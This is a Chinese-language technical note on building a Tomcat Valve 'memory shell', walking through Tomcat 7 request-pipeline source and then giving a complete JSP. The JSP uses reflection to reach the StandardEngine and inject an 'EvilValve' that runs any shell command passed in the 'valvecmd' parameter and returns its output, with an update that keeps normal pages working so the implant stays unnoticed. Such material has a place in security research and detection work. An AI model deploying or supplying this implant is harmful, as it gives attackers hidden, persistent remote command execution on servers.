Tomcat Valve型内存马 - 《Java》

源码分析
实现
参考

由于Valve并不以实体文件存在，深入容器内部不易发现，且又能执行我们想要的代码逻辑，是一个极好利用点。如果Valve插到最顶层的container也就是Engine，则会对Engine下的所有的context生效。

源码分析

版本：apache-tomcat-7.0.109

目的

已知真正处理请求的地方在CoyoteAdapter的service()方法，其中会调用StandardEngine的getPipline()方法获取其pipeline，随后获取pipeline中第一个valve并调用该valve的invoke方法。
企业微信截图_14b36a12-9346-4c92-b98d-18e41b176182.png
企业微信截图_9340330c-7484-4674-b23c-7834938d547b.png
跟进上面源码调用的invoke()方法：
企业微信截图_c896c1cb-b6f8-413a-90d6-3000d31e5864.png
StandardEngineValve继承于ValveBase类。
企业微信截图_3f1e8839-8c91-4402-a22c-85a67090e57c.png
我们的目标是创建一个Valve并插到最顶层的container也就是Engine。
可以考虑实现一个继承于ValveBase类的evilValve实例，并将该实例添加到Pipeline。企业微信截图_7aeea983-e2dc-4061-9f8e-6df2047ee02e.png

添加Valve

已知通过server.xml会注册一个日志记录的Valve，可以通过它看看如何注册Valve。
企业微信截图_10fd8483-8819-41d9-8c4a-dea83e309928.png
AccessLogValve也是继承于ValveBase。看上去只需要两步即可完成Valve的添加。
企业微信截图_0ade7049-74ad-4763-95bf-9baa9e2bb207.png
可回想起前面也调用了getPipeline()方法，对象是StandardEngine。
因此实现步骤可进一步拆解为：

创建ValveBase的子类EvilValve，创建实例evilValve。
获取StandardEngine对象，调用addValve()方法添加evilValve。

获取StandardEngine对象

企业微信截图_9dc5b99f-fdbf-4cff-b1f8-d7643f4bc8f7.png
这里是jsp文件中通过request对象获取StandardEngine对象的方式，即可以通过反射获取到最后一个变量container。

((StandardService)((ApplicationContext)((StandardContext)((Request)((RequestFacade)request).request).context).context).service).container

或者先调用一次方法getServletContext()方法再反射获取，也是一样的：
企业微信截图_e48fc353-53b4-44f7-a27b-2043bf81a491.png

实现

创建ValveBase的子类EvilValve，创建实例evilValve。
通过反射由request获取StandardEngine对象。
StandardEngine调用addValve()方法添加evilValve。

测试环境：apache-tomcat-7.0.109

<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.ApplicationContextFacade" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="org.apache.catalina.core.StandardService" %>
<%@ page import="org.apache.catalina.core.StandardEngine" %>
<%@ page import="org.apache.catalina.valves.ValveBase" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="org.apache.catalina.connector.Response" %>
<%@ page import="java.io.IOException" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStreamReader" %>
<%
    ApplicationContextFacade appCf = (ApplicationContextFacade)request.getServletContext();
    ApplicationContext appCtx = (ApplicationContext)getFieldValue(appCf, "context");
    StandardService stdSrv = (StandardService)getFieldValue(appCtx, "service");
    StandardEngine stdEng = (StandardEngine)getFieldValue(stdSrv, "container");
    EvilValve evilValve = new EvilValve();
    stdEng.getPipeline().addValve(evilValve);
    out.println("注入valve成功!");
%>
<%!
    public class EvilValve extends ValveBase{
        @Override
        public void invoke(Request request, Response response) throws IOException, ServletException {
            String cmder = request.getParameter("valvecmd");
            String[] cmd = new String[]{"/bin/sh", "-c", cmder};
            try {
                Process ps = Runtime.getRuntime().exec(cmd);
                BufferedReader br = new BufferedReader(new InputStreamReader(ps.getInputStream()));
                StringBuffer sb = new StringBuffer();
                String line;
                while ((line = br.readLine()) != null) {
                    sb.append(line).append("\n");
                }
                String result = sb.toString();
                response.getWriter().write(result);
            } catch (Exception e) {
                System.out.println("error ");
            }
            getNext().invoke(request, response); //20210628-Update
        }
    }
    public static Object getFieldValue(Object obj, String fieldName) throws Exception {
        Field f = obj.getClass().getDeclaredField(fieldName);
        f.setAccessible(true);
        return f.get(obj);
    }
%>

20210628-Update：
代码在测试中发现会导致正常业务页面响应异常，排查发现遗漏了getNext操作。

参考

[1].Tomcat容器攻防笔记之Valve内存马出世